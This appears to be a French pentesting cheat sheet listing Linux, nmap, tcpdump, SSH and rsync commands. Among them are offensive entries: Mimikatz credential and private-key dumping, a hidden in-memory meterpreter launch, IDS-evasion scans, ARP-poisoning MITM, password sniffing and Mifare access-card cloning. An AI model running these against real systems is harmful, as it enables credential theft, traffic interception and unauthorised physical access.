CommandesinformationsSoftCatégories
nslookupPermet d'interroger un serveur de noms afin d'obtenir les informations concernant un domaine ou un hôte et permet ainsi de diagnostiquer les éventuels problèmes de configuration du DNSnslookupLinux OS
2 = write (w)Le 1er chiffre est l'autorisation du propriétaire, le 2ème au groupe et le 3ème à tout le mondechmodgestion des permissions
$HOMEAnnuaire personnelLinux standardLinux OS
$PATHChemin de recherche exécutableLinux standardLinux OS
$SHELLshell actuelleLinux standardLinux OS
(tcpdump option) -eEn-têtes Print Link (Ethernet) (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -qLe mode assez et moins verbeux affiche moins de détails (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -SImprimer les numéros de séquence au format exact (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -tNe pas imprimer les détails de l'horodatage dans le vidage (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -vPeu de sortie verbeuse (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -xImprimer les données et les en-têtes au format HEX (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -XSortie d'impression au format HEX et ASCII à l' exclusion des en -têtes de lien (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -xxImprimer des données avec des en-têtes de lien au format HEX (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -XXSortie d'impression au format HEX et ASCII, y compris les en -têtes de lien (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -vvSortie plus verbeuse (option d'affichage)tcpdumpcapture de paquets
(tcpdump option) -vvvSortie la plus verbeuse (option d'affichage)tcpdumpcapture de paquets
1 = execute (x)Le 1er chiffre est l'autorisation du propriétaire, le 2ème au groupe et le 3ème à tout le mondechmodgestion des permissions
4 = read (r) Le 1er chiffre est l'autorisation du propriétaire, le 2ème au groupe et le 3ème à tout le mondechmodgestion des permissions
cat file1 file2Concaténer les fichiers et la sortiecatgestion dossiers et fichiers
cd dossier02Changer de répertoire vers dossier02cdgestion dossiers et fichiers
cd..Remonter l'arborescencecdgestion dossiers et fichiers
chmod 775 fileChanger le mode du fichier en 775chmodgestion des permissions
chmod -R 600 folderDossier chmod récursivement à 600chmodgestion des permissions
chown user:group fileChanger le propriétaire du fichier en utilisateur et le groupe en groupechmodgestion des permissions
cmd &Exécutez cmd dans un sous-shellLinux standardExécution de cmd
cmd &> fileChaque sortie de cmd dans un fichierLinux standardRedirection E/S
cmd < fileEntrée de cmd à partir du fichierLinux standardRedirection E/S
cmd > /dev/nullSupprimer la sortie standard de cmdLinux standardRedirection E/S
cmd > fileSortie standard (stdout) de cmd dans un fichierLinux standardRedirection E/S
cmd >> fileAjouter stdout au fichierLinux standardRedirection E/S
cmd 1>&2stdout au même endroit que stderrLinux standardRedirection E/S
cmd 2> fileSortie d'erreur (stderr) de cmd dans le fichierLinux standardRedirection E/S
cmd 2>&1stderr au même endroit que stdoutLinux standardRedirection E/S
cmd1 | cmd2stdout de cmd1 à cmd2 avec la pipeLinux standardRedirection E/S
cmd1 && cmd2Exécutez cmd2 si cmd1 réussitLinux standardExécution de cmd
cmd1 ; cmd2Exécutez cmd1 puis cmd2Linux standardExécution de cmd
cmd1 |& cmd2stderr de cmd1 à cmd2 avec la pipeLinux standardRedirection E/S
cmd1 || cmd2Exécutez cmd2 si cmd1 ne réussit pasLinux standardExécution de cmd
cmd1 <(cmd2)Sortie de cmd2 en tant qu'entrée de fichier dans cmd1Linux standardRedirection E/S
copié-collé le contenu de la clé publiqueEtape B4 (méthode 1) - Puis on colle dans le fichier "authorized_keys" le contenu de notre clé publique précédemment copié depuis ~/.ssh/id_rsa.pub qui était sur la machine cliente.sshGénérer une paire de clé RSA
cp file1 file2Copier le fichier1 dans le fichier2cpgestion dossiers et fichiers
cryptointeragit avec les modules cryptographiques de Windows CryptoAPI [CAPI]et CNG [CNG], ainsi que l’extraction de certificats et de clés.MimikatzExploitation vulnérabilités
crypto::exportCertificates < MagasinSystème> Etape E - Enfin, il nous suffit d'exécuter la commande suivante pour récupérer le certificat et la clé privée associéeMimikatzExploitation vulnérabilités
crypto::listCertificates Etape B - lister les certificats disponibles MimikatzExploitation vulnérabilités
crypto::listStores Etape A - La première étape consiste à rechercher, dans les magasins de la machine, l’endroit où est stocké le certificat. Dans notre cas, le certificat étant associé à un utilisateur, nous listons les magasins de l'utilisateur courant (CERT_SYSTEM_STORE_CURRENT_USER) via la commande suivante MimikatzExploitation vulnérabilités
crypto::patchcapiEtape C - Afin d'exporter la clé privée du certificat mathieu.mauger, nous patchons le mécanisme de sécurité CryptoAPI à l'aide de la fonction patchapiMimikatzExploitation vulnérabilités
crypto::patchcngEtape D - Si la clé avait été protégée par la CNG, nous aurions dû patcher LSASS avant d’exporter viaMimikatzExploitation vulnérabilités
ctrl-Onano - Enregistrer le fichiernano gestion dossiers et fichiers
ctrl-Rnano - Lire le fichiernano gestion dossiers et fichiers
ctrl-Xnano - fermer le fichiernano gestion dossiers et fichiers
dateAfficher la date du systèmeLinux standardLinux OS
divers contient diverses fonctions majoritairement expérimentales.MimikatzExploitation vulnérabilités
echo $NAMEValeur de sortie de la variable $ NAMELinux standardLinux OS
envAfficher les variables d'environnementLinux standardLinux OS
ether src/ dst host (ethernet host name or IP)Filtrage d'hôte Ethernet par source ou destinationtcpdumpcapture de paquets
ether/ip broadcastFiltre pour les diffusions Ethernet ou IPtcpdumpcapture de paquets
ether/ip multicastFiltre pour les multidiffusions Ethernet ou IPtcpdumpcapture de paquets
export NAME=valueDéfinir $ NAME sur la valeurLinux standardLinux OS
file file1Obtenir le type de fichier1Linux standardgestion dossiers et fichiers
find /root/ -name photo*Trouver les fichiers commençant par photofindgestion dossiers et fichiers
find /root/ -user totoTrouver les fichiers détenus par utilisateur totofindgestion dossiers et fichiers
find /root/ -mmin 10Trouver les fichiers modifier il y'a moins de 10  minutes findgestion dossiers et fichiers
grep " open " results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | lessListe triée inversée de la fréquence à laquelle les ports apparaissentnmapCommande spéciale
grep -iRecherche insensible à la cassegrepgestion dossiers et fichiers
grep -oAfficher uniquement la partie correspondante du fichiergrepgestion dossiers et fichiers
grep -rRecherche récursivegrepgestion dossiers et fichiers
grep toto fichier01.txtRechercher "toto" dans les fichier01.txtgrepgestion dossiers et fichiers
grep -vRecherche inverséegrepgestion dossiers et fichiers
head -n1 /etc/issueAfficher la distributionLinux standardLinux OS
head file1Afficher les 10 premières lignes du fichier1headgestion dossiers et fichiers
inject injection de bibliothèques dans des processus Windows.MimikatzExploitation vulnérabilités
kelloworld (bibliothèque)est une bibliothèque servant d’exemple pour l’injectionMimikatzExploitation vulnérabilités
kill pidTuer le processus avec id pidkillGestion des processus
killall nameTuez tous les processus avec des noms commençant par le nom indiquerkillGestion des processus
klock (bibliothèque)permet la manipulation de bureaux.MimikatzExploitation vulnérabilités
L' UID c'est quoi ?UID - Identifiant unique d'une puce nfc (ex: ea b5 8f 4b)informations nfcNFC /Rfid
La cle privée c'est quoi?une clé dite « privée » qui sert à déchiffrer. (id_rsa)sshGénérer une paire de clé RSA
La clé publique c'est quoi?une clé dite « publique » qui sert à chiffrer (id_rsa.pub)sshGénérer une paire de clé RSA
Le block 0 c'est quoi ?Le "block 0" c'est là qu'est écrit le numéro de série de la puce (UID)informations nfcNFC /Rfid
Les clés A et B c'est quoi ? Ce sont les 2 clés qui protèges les block secteur de la puce NFCinformations nfcNFC /Rfid
less file1Afficher et paginer le fichier1lessgestion dossiers et fichiers
locate fileRechercher un fichier (recherche rapide de l'index système)locategestion dossiers et fichiers
lslister des dossiers et fichierslsgestion dossiers et fichiers
ls -aTout afficher (y compris masqué)lsgestion dossiers et fichiers
ls -IFormat de liste longuelsgestion dossiers et fichiers
ls -lLister un fichier par lignelsgestion dossiers et fichiers
ls -mSortie séparée par des virguleslsgestion dossiers et fichiers
ls -QSortie citéelsgestion dossiers et fichiers
ls -RListe récursivelsgestion dossiers et fichiers
ls -rLister par Ordre inverselsgestion dossiers et fichiers
ls -STrier par taille de fichierlsgestion dossiers et fichiers
ls -tTrier par taille de fichierlsgestion dossiers et fichiers
macchanger -m 23:05:13:37:42:21 eth0Changer l'adresses MAC de mon interface eth0macchangerUsurpation d'adresse MAC
man nom_du_softAfficher le manuel de la commandeLinux standardLinux OS
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a é"sekurlsa::logonPasswords full" exite' * H : crée un processus caché.
* i : interagit avec le processus une fois ce dernier créé.
* c : déporte la sortie standard de l’exécutable sur le shell meterpreter.
* d : indique le nom du processus à utiliser et qui apparaîtra ainsi dans le gestionnaire des tâches.
* m : exécute le programme depuis la mémoire.
* f : signale l’exécutable.
* a : signale les arguments. Il est à noter l'utilisation de guillemets pour les arguments de Mimikatz.B23
Mimikatz + meterpreterCommande spéciale
mfcuk -C -R 0:AExtraction de la clé A sur le block 0 ( -C = initialise la connection au lecteur)mfcukNFC /Rfid
mfoc -P 500 -O carte-acces.dmpCréation dump de la puce carte d'accès (originale)mfocNFC /Rfid
mfoc -O mifare_dump.mfd -k xxxxxxxxxxxxutiliser la clef trouvé (xxxxxx ) pour retrouver toutes les autres clefsmfocNFC /Rfid
mfoc -P 500 -O puce-originale.dmpEtape A - Extraction des infos + block0 (uid) + clés défaut (a+b) de puce originalmfocNFC /Rfid
mfoc -P 500 -O puce-vierge.dmpEtape B - Extraction des infos + block0 (uid) + clés défaut (a+b) de puce originalmfocNFC /Rfid
mimikatz.sys (pilote)Enfin, un pilote mimikatz.sys est également fourni et permet ainsi d’avoir un point d’entrée en mode utilisateur dans le noyauMimikatzExploitation vulnérabilités
minesweeper module de démonstration permettant de manipuler le démineur de Windows XP et 7.MimikatzExploitation vulnérabilités
mkdir .sshEtape B2 (méthode 1) - Puis créer s’il n’existe pas, le répertoire .ssh à la racine du répertoire utilisateur du serveur distantsshGénérer une paire de clé RSA
mkdir dossier01Créer un répertoire dossier01mkdirgestion dossiers et fichiers
mountAfficher les systèmes de fichiers montésLinux standardLinux OS
mv file1 file2Déplacer le fichier1 vers le fichier2mvgestion dossiers et fichiers
nano /.ssh/authorized_keysEtape B3 (méthode 1) - Puis créer s’il n’existe pas, le fichier "authorized_keys", ou seront copiés les clés publiques autorisées à se connecter.sshGénérer une paire de clé RSA
nano fichier.txtnano - crée le fichier.txtnano gestion dossiers et fichiers
ncat 192.168.1.10 1337Connection à l'hote 192.168.1.10 sur le port TCP 1337ncatOutils de connection
ncat -l -p 1337Écouter sur le port TCP 1337ncatOutils de connection
ncat --ssl 10.5.23.42 1337Connectez-vous au service TLSncatCertificats TLS - SSL
ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pemDémarrez le serveur TLSncatCertificats TLS - SSL
ndiff scanl.xml scan2.xmlComparez la sortie de nmap en utilisant le ndifnmapCommande spéciale
nfc-list Lecture simple d'une puce nfcnfc-listNFC /Rfid
nfc-list -vLecture avancée d'une puce nfcnfc-listNFC /Rfid
nfc-mfclassic r a u carte-original-avec-clés-a-b-par-défaut.binDumper le contenu de la carte vers le fichier ,bin en utilisant des clefs a et b par défaut nfc-mfclassicNFC /Rfid
nfc-mfclassic W a carte-acces.dmp carte-vierge.dmpEcriture avec (block 0) de carte-accès.dmp sur une carte vierge nfc-mfclassicNFC /Rfid
nfc-mfclassic W a puce-originale.dmp puce-vierge.dmpEtape C - Copie avec block0 de puce-originale vers puce-viergenfc-mfclassicNFC /Rfid
nfc-scan-deviceLister les lecteurs disponiblesnfc-scanNFC /Rfid
nmap 192.168.1.0/24Numériser en utilisant la notation CIDRnmapScanner de reseaux
nmap 192.168.1.1Scanner une seule IPnmapScanner de reseaux
nmap 192.168.1.1 192.168.2.1Analyser des adresses IP spécifiquesnmapScanner de reseaux
nmap 192.168.1.1 -APermet la détection du système d'exploitation, la détection de version,l'analyse de script et le traceroutenmapDetection OS
nmap 192.168.1.1 -dAugmentez le niveau de débogage (utilisez -dd ou plus pour un meilleur effet)nmapSortie des résultats d'analyses
nmap 192.168.1.1 -FAnalyse rapide des ports (100 ports)nmapScan d'hote
nmap 192.168.1.1 -fL'analyse demandée (y compris les analyses ping) utilise de minuscules paquets IP fragmentés. Plus difficile pour les filtres de paquetsnmapUsurpation de pare-feu / IDS
nmap 192.168.1.1 --mtu 32Définissez votre propre taille de MTUnmapUsurpation de pare-feu / IDS
nmap 192.168.1.1 -nNe jamais faire de résolution DNS pendant le scannmapScan d'hote
nmap 192.168.1.1 -ODétection du système d'exploitation à distance à l'aide de l'empreinte de la pile TCP / IPnmapDetection OS
nmap 192.168.1.1 -oA resultsSortie dans les trois principaux formats à la fois nmapSortie des résultats d'analyses
nmap 192.168.1.1 -oG grep.fileSortie "Grepable" dans le fichier grep.filenmapSortie des résultats d'analyses
nmap 192.168.1.1 -oN normal.fileSortie normale dans le fichier normal.filenmapSortie des résultats d'analyses
nmap 192.168.1.1 --openAfficher uniquement les ports ouverts (ou éventuellement ouverts)nmapSortie des résultats d'analyses
nmap 192.168.1.1 -oX xml.fileSortie XML dans le fichier xml.filenmapSortie des résultats d'analyses
nmap 192.168.1.1 -p 21Scan un seul port nmapScan d'hote
nmap 192.168.1.1 -p 21-100Scan une plage de ports nmapScan d'hote
nmap 192.168.1.1 -p http,httpsAnalyse des ports à partir du nom du servicenmapScan d'hote
nmap 192.168.1.1 -p U: 53, T: 21-25,80Analyse des ports spécifiques en TCP et UDPnmapScan d'hote
nmap 192.168.1.1 -p0-Balayage de tous les portsnmapScan d'hote
nmap 192.168.1.1 --reasonAfficher la raison pour laquelle un port est dans un état particulier, même sortie que -vvnmapSortie des résultats d'analyses
nmap 192.168.1.1 -sAAnalyse du port TCP ACKnmapTechnique de scan
nmap 192.168.1.1 -sCAnalyser avec les scripts NSE par défaut. Considéré comme utile pour la découverte et sûrnmapScripts NSE
nmap 192.168.1.1 --script "not intrusive"Analyser les paramètres par défaut, mais supprimer les scripts intrusifsnmapScripts NSE
nmap 192.168.1.1 --script defaultAnalyser avec les scripts NSE par défaut. Considéré comme utile pour la découverte et sûrnmapScripts NSE
nmap 192.168.1.1 --script=bannerNumérisez avec un seul script. Exemple de bannièrenmapScripts NSE
nmap 192.168.1.1 --script=http*Numérisez avec un caractère générique. Exemple httpnmapScripts NSE
nmap 192.168.1.1 --script=http,bannerScannez avec deux scripts. Exemple http et bannièrenmapScripts NSE
nmap 192.168.1.1 -sMAnalyse des ports TCP MaimonnmapTechnique de scan
nmap 192.168.1.1 -sSAnalyse des ports TCP SYN (par défaut)nmapTechnique de scan
nmap 192.168.1.1 -sTAnalyse du port de connexion TCPnmapTechnique de scan
nmap 192.168.1.1 -sUAnalyse des ports UDPnmapTechnique de scan
nmap 192.168.1.1 -sVTente de déterminer la version du service en cours d'exécution sur le portnmapDetection des services et versions
nmap 192.168.1.1 -sV --version-intensity 8Niveau d'intensité 0 à 9. Attention ! Un nombre plus élevé augmente les faux positifs.nmapDetection des services et versions
nmap 192.168.1.1 -sWAnalyse des ports de la fenêtre TCPnmapTechnique de scan
nmap 192.168.1.1 -T0Paranoid (0) (analyse lente) Détection d' intrusion évasion systèmenmapVitesse de scan
nmap 192.168.1.1 -T1Sneaky (1) Système de détection d' intrusion évasion nmapVitesse de scan
nmap 192.168.1.1 -T2Polite (2) ralentit l'analyse pour utiliser moins de bande passante et utiliser moins de ressources de la machine ciblenmapVitesse de scan
nmap 192.168.1.1 -T3Normal (3) qui est la vitesse par défautnmapVitesse de scan
nmap 192.168.1.1 -T4Les balayages agressifs (4) accélèrent; suppose que vous êtes sur un réseau raisonnablement rapide et fiablenmapVitesse de scan
nmap 192.168.1.1 -T4 --packet-traceAfficher tous les paquets envoyés et reçusnmapSortie des résultats d'analyses
nmap 192.168.1.1 -T5Balayage de vitesses folles (5); suppose que vous êtes sur un réseau extrêmement rapidenmapVitesse de scan
nmap 192.168.1.1 -vAugmentez le niveau de verbosité (utilisez -vv ou plus pour un meilleur effet)nmapSortie des résultats d'analyses
nmap 192.168.1.1/24 -snDésactivez l'analyse des ports. Découverte d'hôte uniquement.nmapScan d'hote
nmap 192.168.1.1-1/24 -PR -sn -vvDécouverte Arp uniquement sur le réseau local, pas de scan de portnmapCommande spéciale
nmap 192.168.1.1-254Scanner une plage d'IPnmapScanner de reseaux
nmap 192.168.1.1-3 -sLPas de scan. Lister les cibles uniquementnmapScan d'hote
nmap 192.168.1.1-5 -PnDésactivez la découverte d'hôte. Analyse des ports uniquement.nmapScan d'hote
nmap 192.168.1.1-50 -sL --dns-server 192.168.1.1Interrogez le DNS interne pour les hôtes, répertoriez uniquement les ciblesnmapCommande spéciale
nmap -6 2607: f0d0: 1002: 51 :: 4Scanner adresse IPv6nmapScanner de reseaux
nmap -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1Envoyer des scans à partir d'adresses IP usurpéesnmapUsurpation de pare-feu / IDS
nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ipEnvoyer des scans à partir d'adresses de leurre (a choisir)nmapUsurpation de pare-feu / IDS
nmap --data-length 200 192.168.1.1Ajoute des données aléatoires aux paquets envoyésnmapUsurpation de pare-feu / IDS
nmap --exclude 192.168.1.1Exclure les hôtes répertoriésnmapScanner de reseaux
nmap -f -t 0 -n -Pn - longueur des données 200 -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1Exemple de commande IDS EvasionnmapUsurpation de pare-feu / IDS
nmap -g 53 192.168.1.1Utiliser le numéro de port source donnénmapUsurpation de pare-feu / IDS
nmap -hécran d'aide nmapnmapScanner de reseaux
nmap --iflistAffiche les interfaces et les itinéraires de l'hôtenmapSortie des résultats d'analyses
nmap -iL targets.txtAnalyser les cibles à partir d'un fichiernmapScanner de reseaux
nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txtGénérer une liste des adresses IP des hôtes en directnmapCommande spéciale
nmap -iR 10 -sn -tracerouteTraceroute vers des cibles aléatoires, pas de scan de portnmapCommande spéciale
nmap -iR 100Analyser 100 hôtes aléatoiresnmapScanner de reseaux
nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000Recherche rapide de serveurs Web aléatoiresnmapScripts NSE
nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1Safe SMB scripts to runnmapScripts NSE
nmap -p80 --script http-sql-injection scanme.nmap.orgRechercher des injections SQLnmapScripts NSE
nmap -p80 --script http-unsafe-output-escaping scanme.nmap.orgDétecter les vulnérabilités des scripts intersitesnmapScripts NSE
nmap -p80 -sV -oG - --open 192.168.1.1/24 | grep openRechercher les serveurs Web et grep pour afficher les adresses IP exécutant des serveurs WebnmapCommande spéciale
nmap -Pn --script = http-sitemap-generator scanme.nmap.orggénérateur de plan de site httpnmapScripts NSE
nmap -Pn --script=dns-brute domain.comBrute force les noms d'hôtes DNS à deviner les sous-domainesnmapScripts NSE
nmap --proxies http://192.168.1.1:8080, http://192.168.1.2:8080 192.168.1.1Connexions relais via des proxys HTTP / SOCKS4nmapUsurpation de pare-feu / IDS
nmap --resume results.fileReprendre une analysenmapSortie des résultats d'analyses
nmap -S www.microsoft.com www.facebook.comScanner Facebook à partir de Microsoft (-e eth0 -Pn peut être requis)nmapUsurpation de pare-feu / IDS
nmap scanme.nmap.orgAnalyser un domainenmapScanner de reseaux
nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1Script NSE avec argumentsnmapScripts NSE
nmap --script whois* domain.comRequête WhoisnmapScripts NSE
nogpo permet de contourner certaines GPO Windows triviales.MimikatzExploitation vulnérabilités
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.org/"Créer un certificat auto-signéopensslCertificats TLS - SSL
openssl s_client -connect 10.5.23.42:1337Connectez-vous au service TLS en utilisant opensslopensslCertificats TLS - SSL
openssl s_client -connect 10.5.23.42:1337 | openssl x509 -textAfficher les détails du certificatopensslCertificats TLS - SSL
pkill nameTuer le processus avec le nom du processuskillGestion des processus
privilege::debug il est nécessaire de nous attribuer le privilège Debug si nous ne sommes pas déjà SYSTEMMimikatzExploitation vulnérabilités
psAfficher un instantané des processuspsGestion des processus
pwdAfficher le répertoire actuelLinux standardgestion dossiers et fichiers
rm file1Supprimer le fichier1rmgestion dossiers et fichiers
rsync option (-a )mode archivage, permet de copier de manière récursive, de préserver les permissions et de ne pas suivre les liens symboliquesrsyncSynchonisation des données
rsync option (--dry-run)effectuer un essai sans modificationrsyncSynchonisation des données
rsync option (-e ssh )permet d’utiliser ssh pour le transfert de donnéesrsyncSynchonisation des données
rsync option (-v )verbose, affiche la liste des fichiers copiésrsyncSynchonisation des données
rsync option (-z )compress, permet de compresser les données avant de les transférerrsyncSynchonisation des données
rsync -ave ssh serveur_ip_ou_nom:/chemin/vers/source /chemin/vers/destinationSynchoniser source et destination d'un serveur à l'autre (méthode 2)rsync + sshSynchonisation des données
rsync chemin/vers/source chemin/vers/destinationSynchoniser source et destination depuis la même machinersyncSynchonisation des données
rsync -e ssh -avz /chemin/vers/source serveur_ip_ou_nom:/chemin/vers/destinationSynchoniser source et destination d'un serveur à l'autre (méthode 1)rsync + sshSynchonisation des données
samdump permet d’extraire les hashes de la base SAM de l’équipement Windows, via la base de registre ou des fichiers plats.MimikatzExploitation vulnérabilités
sekurlsa extrait les hashes et mots de passe des sessions Windows en cours.MimikatzExploitation vulnérabilités
sekurlsa (bibliothèque)fournit les mêmes fonctionnalités que le module éponyme. Il est préconisé de privilégier l’utilisation du module.Elle ne contient maintenant que les fonctionnalités devant s'exécuter dans le processus LSASS (processus gérant l'authentification des utilisateurs de l'équipement).MimikatzExploitation vulnérabilités
sekurlsa::logonPasswords fullA voirMimikatzExploitation vulnérabilités
socat TCP-LISTEN:2305,fork,reuseaddr ssl:example.com:443Proxy TCP vers TLSopensslCertificats TLS - SSL
sqlmap -u "site:www.site-exemple.com inurl:produit.php"Recherche d'erreurs SQL sur le "www.site-exemple.com" via le dorks "produit.php"SqlmapInjection SQL
src/ dsthost (host name or IP)Filtrer par adresse IP ou hôte source ou de destinationtcpdumpcapture de paquets
src/ dstnet (subnet mask in CIDR)Filtrer par sous-réseautcpdumpcapture de paquets
ssh user@mon_serveurEtape B1 (méthode 1) - se connecter manuellement en ssh sur le serveur distant sshGénérer une paire de clé RSA
ssh-add Etape C - "L'agent ssh" retient les clés privées pendant toute la durée de votre session.Maintenant, a chaque fois que vous vous connecterez à ce serveur distant, vous n'aurez plus besoin d'entrer la passphrasesshGénérer une paire de clé RSA
ssh-copy-id -i id_rsa.pub user@ip-serveur-distantEtape B5 (méthode 2) - Envoyer la clé publique "id_rsa.pub" au serveur distant et à l'ajouter à son fichier "authorized_keys(clés autorisées)". Le serveur y garde une liste des clés qu'il autorise à se connecter.sshGénérer une paire de clé RSA
ssh-keygen -p -t rsaEtape E - Si vous souhaitez par la suite modifier le mot de passe de la clé, il faudra utiliser cette commandesshGénérer une paire de clé RSA
ssh-keygen -t rsaEtape A1 - créer une clé publique et clé privée sur sa machine cliente ( L’emplacement par défaut ou seront générés les clés /home/votre_user/.ssh/id_rsa )sshGénérer une paire de clé RSA
ssh-keygen -t rsaEtape A2 - Indiquer le "nom du fichier de clé" /home/toto/.ssh/ id_rsa_rsync et le "pass" vide pour connexion auto de rsync sshGénérer une paire de clé RSA
sslyze --regular 10.5.23.42:443Tester le certificat et les chiffrements du serveur TLSopensslCertificats TLS - SSL
standardintègre les commandes de base de l'outilMimikatzExploitation vulnérabilités
sudo /etc/init.d/ssh restartEtape D - Lors du simple ajout de clé, il est nécessaire de redémarrer le server openssh afin qu’il prenne en compte le nouveau clientsshGénérer une paire de clé RSA
system intègre des commandes système de base telles que l’obtention de l’utilisateur et de l’ordinateur courant.MimikatzExploitation vulnérabilités
tail -F file1Sortie des dernières lignes du fichier1 à mesure qu'il changetailgestion dossiers et fichiers
tail file1Afficher les 10 dernières lignes du fichier1tailgestion dossiers et fichiers
tcp/udp src/dst port ( port number)Filtrer les paquets TCP ou UDP par port source ou de destinationtcpdumpcapture de paquets
tcp/udp src/dst port range ( port number range)Filtrer les paquets TCP ou UDP par plage de ports source ou de destinationtcpdumpcapture de paquets
tcpdump <32Affiche la taille des paquets inférieure à 32tcpdumpcapture de paquets
tcpdump >=32Affiche la taille des paquets supérieure à 32tcpdumpcapture de paquets
tcpdump -d tcpdump.pcapafficher une forme lisible par l'homme dans la sortie standardtcpdumpcapture de paquets
tcpdump dst 10.1.1.1 && !icmpL'une ou l'autre des conditions peut correspondretcpdumpcapture de paquets
tcpdump dst 10.1.1.1 and not icmpNégation de la conditiontcpdumpcapture de paquets
tcpdump dst 10.1.1.100Capturer à partir d'une adresse de destination spécifiquetcpdumpcapture de paquets
tcpdump ether host aa: bb: cc: 11: 22: 33"host" pour limiter la sortie à une adresse MAC spécifiquetcpdumpcapture de paquets
tcpdump ether port 80Capturer le trafic à partir d'un port défini uniquementtcpdumpcapture de paquets
tcpdump -F tcpdump.pcapUtilisez le fichier donné comme entrée pour le filtretcpdumpcapture de paquets
tcpdump host 192.168.1.100Capturer des paquets d'un hôte spécifiquetcpdumpcapture de paquets
tcpdump httpFiltrer le trafic en fonction d'un numéro de port pour un servicetcpdumpcapture de paquets
tcpdump -i anyCapture depuis toutes les interfacestcpdumpcapture de paquets
tcpdump -i eth0Capture depuis une interface spécifiquetcpdumpcapture de paquets
tcpdump -I eth0définir l'interface comme mode moniteurtcpdumpcapture de paquets
tcpdump -i eth0 -c 10Capturez les 10 premiers paquets et quitteztcpdumpcapture de paquets
tcpdump -i eth0 -w tcpdump.txtPour enregistrer la capture dans un fichiertcpdumpcapture de paquets
tcpdump -K tcpdump.pcapNe pas vérifier la somme de contrôletcpdumpcapture de paquets
tcpdump -LAfficher les types de liaison de données pour l'interfacetcpdumpcapture de paquets
tcpdump -n -I eth0Ne résolvez pas les noms d'hôtetcpdumpcapture de paquets
tcpdump -N tcpdump.pcapne pas imprimer les noms de domainetcpdumpcapture de paquets
tcpdump -n src 192.168.1.1 and dst port 21Combiner les options de filtragetcpdumpcapture de paquets
tcpdump net 10.1.1.0/16Capturer des fichiers à partir du sous-réseau du réseautcpdumpcapture de paquets
tcpdump -p -i eth0Ne pas capturer en mode promiscuitétcpdumpcapture de paquets
tcpdump port 80Filtrer le trafic en fonction d'un servicetcpdumpcapture de paquets
tcpdump portrange 21-125Filtre basé sur la plage de portstcpdumpcapture de paquets
tcpdump -r file_path_and_nameLecture d'une capture tcpdumpcapture de paquets
tcpdump -S httpAfficher le paquet entiertcpdumpcapture de paquets
tcpdump src 10.1.1.100Capturer à partir d'une adresse source spécifiquetcpdumpcapture de paquets
tcpdump -DAfficher les interfaces disponiblestcpdumpcapture de paquets
tcpdump -i eth0 -AImprimer en ASCIItcpdumpcapture de paquets
tcpdump -i eth0 -c 10 -w tcpdump.pcap tcpCapturer uniquement les paquets TCPtcpdumpcapture de paquets
tcpdump -i eth0 port 80Capturer le trafic à partir d'un port défini uniquementtcpdumpcapture de paquets
tcpdump -n -i eth0Arrêter la traduction et les recherches de noms de domaine (noms d'hôte ou noms de port)tcpdumpcapture de paquets
tcpdump -r tcpdump.txtLire et analyser le fichier de capture enregistrétcpdumpcapture de paquets
tcpdunp -IPV6Afficher uniquement les paquets IPV6tcpdumpcapture de paquets
Tester le certificat TLS sur les sites "ssllabs.com" et "hardenize.com"Tester le certificat TLS en ligneopensslCertificats TLS - SSL
topAfficher les processus en temps réelkillGestion des processus
touch file1.txtCréer un fichier1.txt avec touchtouchgestion dossiers et fichiers
ts manipulation des sessions Terminal Server (autorise le dépassement du nombre maximal de connexions simultanées notamment).MimikatzExploitation vulnérabilités
uname -aAfficher le système et le noyauLinux standardLinux OS
uptimeAfficher la disponibilitéLinux standardLinux OS
watch -n 5 'ntpq -p'Émettez la commande 'ntpq -p' toutes les 5 secondes et affichez la sortiewatchVoir exécuter une cmd tout les 5s
whereis commandTrouver binaire / source / manuel pour la "commande"whereisgestion dossiers et fichiers
whoamiMontrez votre nom d'utilisateurLinux standardLinux OS
winmine module de démonstration permettant de manipuler le démineur de Windows XP et 7.MimikatzExploitation vulnérabilités
xsltproc nmap.xml -o nmap.htmlConvertir les fichiers xml nmap en fichiers htmlnmapCommande spéciale
arpspoof -i wlan0 192.168.1.20 192.168.1.1arpspoof -i interface ip_cible ip_du_routeurarpspoof - suite dsniffMITM - Man In The Middle
mitmf --arp --spoof --gateway 192.168.1.1 --target 192.168.1.20 -i wlan0Empoisonnement de la table ARP de l'hote 192.168.1.20 via l'interface wlan0 mitmfMITM - Man In The Middle
mitmf --arp --spoof --gateway 192.168.1.1 -i wlan0Empoisonnement de la table ARP de tous les hosts du LAN via l'interface wlan0mitmfMITM - Man In The Middle
arp -a Afficher ma table ARParpspoof - suite dsniffMITM - Man In The Middle
ip neighAfficher mon cache ARPip neighMITM - Man In The Middle
ip neigh flush allSupprimer mon cache ARPip neighMITM - Man In The Middle
ssh root@192.168.1.20 tcpdump -U -s0 -w - 'not port 22' | wireshark -k -i -Analyser le trafic à distance via SSH avec Wireshark (spécifiez "l'option -U" pour empêcher la mise en mémoire tampon et "-i any" pour voir toutes les interfacesssh + tcpdump + wiresharkCapture de paquets à distance
ngrep -i passwordRechercher le mot "password" dans le trafic réseau:ngrepAnalyse de paquets
urlsnarfAfficher les requêtes HTTP GETurlsnarfAnalyse de paquets
driftnetAfficher les images transmisesdriftnetAnalyse de paquets
nmap -Pn -n -sS -p 22,25,80,443,8080 10.5.23.0/24Scan TCP (scan SYN = scan semi-ouvert)nmapScanner de reseaux
